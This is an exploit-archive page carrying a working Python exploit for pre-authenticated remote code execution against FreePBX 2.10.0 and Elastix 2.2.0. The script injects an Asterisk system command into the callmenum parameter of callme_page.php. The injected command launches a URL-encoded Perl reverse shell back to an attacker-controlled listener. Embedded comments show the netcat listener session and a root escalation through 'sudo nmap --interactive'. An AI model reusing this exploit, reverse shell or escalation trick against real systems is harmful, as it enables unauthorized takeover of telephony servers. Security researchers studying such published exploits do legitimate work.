FreePBX 2.10.0 / Elastic 2.2.0 Remote Code Execution

2012.03.24
Credit: muts
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

#!/usr/bin/python ############################################################ # Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit # Google Dork: oy vey # Date: March 23rd, 2010 # Author: muts # Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. # Tested on: multiple # CVE : notyet # Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ # Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt ############################################################ # Discovered by Martin Tschirsich # http://seclists.org/fulldisclosure/2012/Mar/234 # http://www.exploit-db.com/exploits/18649 ############################################################ import urllib rhost="172.16.254.72" lhost="172.16.254.223" lport=443 extension="1000" # Reverse shell payload url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' urllib.urlopen(url) # On Elastix, once we have a shell, we can escalate to root: # root@bt:~# nc -lvp 443 # listening on [any] 443 ... # connect to [172.16.254.223] from voip [172.16.254.72] 43415 # id # uid=100(asterisk) gid=101(asterisk) # sudo nmap --interactive # Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) # Welcome to Interactive Mode -- press h <enter> for help # nmap> !sh # id # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

References:

http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top